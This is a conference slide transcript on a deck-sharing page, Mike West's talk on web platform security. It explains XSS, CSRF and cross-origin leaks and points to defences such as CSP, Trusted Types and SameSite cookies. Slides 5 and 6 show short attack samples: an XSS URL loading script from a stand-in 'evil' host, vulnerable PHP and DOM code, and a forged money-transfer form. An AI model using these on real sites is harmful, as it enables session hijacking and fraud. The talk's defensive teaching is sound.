Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security @ TechDays 2019

Avatar for Mike West Mike West
June 03, 2019
Programming
1
180

Web Platform Security @ TechDays 2019

Web Platform Security.
Avatar for Mike West

Mike West

June 03, 2019
Tweet

More Decks by Mike West

See All by Mike West
W3C Permissions Workshop - 2022-12-05
Avatar for Mike West mikewest
0
120
Isolation by Default
Avatar for Mike West mikewest
0
1.9k
The Web We Can Ship
Avatar for Mike West mikewest
0
500
Web Platform Security @ CMS Security Summit 2020
Avatar for Mike West mikewest
0
3.3k
Cookies are bad @ HTTP Workshop 2019
Avatar for Mike West mikewest
0
460
Web Platform Security @ CMS Security Summit
Avatar for Mike West mikewest
0
130
Web Platform Security PhD Summit @ Google Munich
Avatar for Mike West mikewest
2
990
BSides Munich
Avatar for Mike West mikewest
0
340
Hardening the Web Platform - AppSec EU, 2016
Avatar for Mike West mikewest
5
1.5k

Other Decks in Programming

See All in Programming
AIプログラマーDevinは PHPerの夢を見るか?
Avatar for Shinya Saita shinyasaita
1
190
都市をデータで見るってこういうこと PLATEAU属性情報入門
Avatar for nokonoko1203 nokonoko1203
1
590
Cursor AI Agentと伴走する アプリケーションの高速リプレイス
Avatar for どすこい daisuketakeda
1
130
Quand Symfony, ApiPlatform, OpenAI et LangChain s'allient pour exploiter vos PDF : de la théorie à la production…
Avatar for Ahmed EBEN HASSINE ahmedbhs123
0
130
Team topologies and the microservice architecture: a synergistic relationship
Avatar for Chris Richardson cer
PRO
0
1.2k
Code as Context 〜 1にコードで 2にリンタ 34がなくて 5にルール? 〜
Avatar for Yoda Keisuke yodakeisuke
0
120
git worktree × Claude Code × MCP ~生成AI時代の並列開発フロー~
Avatar for hisuzuya hisuzuya
1
540
ISUCON研修おかわり会 講義スライド
Avatar for Yuki Yata arfes0e2b3c
0
350
PHPで始める振る舞い駆動開発(Behaviour-Driven Development)
Avatar for uutan1108 ohmori_yusuke
2
260
AIエージェントはこう育てる - GitHub Copilot Agentとチームの共進化サイクル
Avatar for Akira Kobori koboriakira
0
500
イベントストーミング図からコードへの変換手順 / Procedure for Converting Event Storming Diagrams to Code
Avatar for nrs nrslib
2
620
deno-redisの紹介とJSRパッケージの運用について (toranoana.deno #21)
Avatar for uki00a uki00a
0
180

Featured

See All Featured
Git: the NoSQL Database
Avatar for Brandon Keepers bkeepers
PRO
430
65k
We Have a Design System, Now What?
Avatar for Morgane Peng morganepeng
53
7.7k
Optimizing for Happiness
Avatar for Tom Preston-Werner mojombo
379
70k
Build The Right Thing And Hit Your Dates
Avatar for Maggie C. maggiecrowley
36
2.8k
CSS Pre-Processors: Stylus, Less & Sass
Avatar for Bermon Painter bermonpainter
357
30k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
Avatar for Eileen M. Uchitelle eileencodes
35
2.4k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
Avatar for soudai sone soudai
PRO
181
53k
Faster Mobile Websites
Avatar for Dean Hume deanohume
307
31k
Product Roadmaps are Hard
Avatar for C. Todd Lombardo iamctodd
PRO
54
11k
Writing Fast Ruby
Avatar for Erik Berlin sferik
628
62k
Measuring & Analyzing Core Web Vitals
Avatar for Philip Tellis bluesmoon
7
500
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
Avatar for Michelle Schulp Hunt marktimemedia
31
2.4k

Transcript

  1. Web Platform Security Mike West, Google Chrome @mikewest [email protected] http://bit.ly/wps_techdays_2019

  2. None
  3. None

  4. Google Vulnerability Reward Program (VRP) payouts in 2018 XSS 35.6%

    CSRF 3.2% Clickjacking 4.2% Other web bugs 7.8% Non-web issues 49.1% Mobile app vulnerabilities Business logic (authorization) Server /network misconfigurations ...

  5. Injections <?php echo $_GET["query"] ?> foo.innerHTML = location.hash.slice(1) 1. Logged

    in user visits attacker's page 2. Attacker navigates user to a vulnerable URL 3. Script runs, attacker gets access to user's session … and many other patterns Bugs: Cross-site scripting (XSS) https://victim.example/?query=<script src="//evil/">

  6. Insufficient isolation 1. Logged in user visits attacker's page 2.

    Attacker sends cross-origin request to vulnerable URL 3. Attacker takes action on behalf of user, or infers information about the user's data in the vulnerable app. Bugs: Cross-site request forgery (CSRF), XS-leaks, timing, ... <form action="/transferMoney"> <input name="recipient" value="Lukas" /> <input name="amount" value="10" /> <form action="//victim.example/transferMoney"> <input name="recipient" value="Attacker" /> <input name="amount" value="∞" />

  7. Insufficient isolation New classes of flaws related to insufficient isolation

    on the web: - Microarchitectural issues (Spectre / Meltdown) - Advanced web APIs used by attackers - Improved exploitation techniques The number and severity of these flaws is growing.

  8. Collaborate in standards bodies

  9. https://w3c.github.io/webappsec-csp/ https://csp.withgoogle.com/

  10. https://wicg.github.io/trusted-types

  11. https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis https://web.dev/samesite-cookies-explained/

  12. https://w3c.github.io/webappsec-fetch-metadata

  13. https://github.com/whatwg/html/issues/3740

  14. https://github.com/whatwg/fetch/issues/687

  15. https://www.arturjanc.com/cross-origin-infoleaks.pdf

  16. Thanks! Mike West, Google Chrome @mikewest [email protected] http://bit.ly/wps_techdays_2019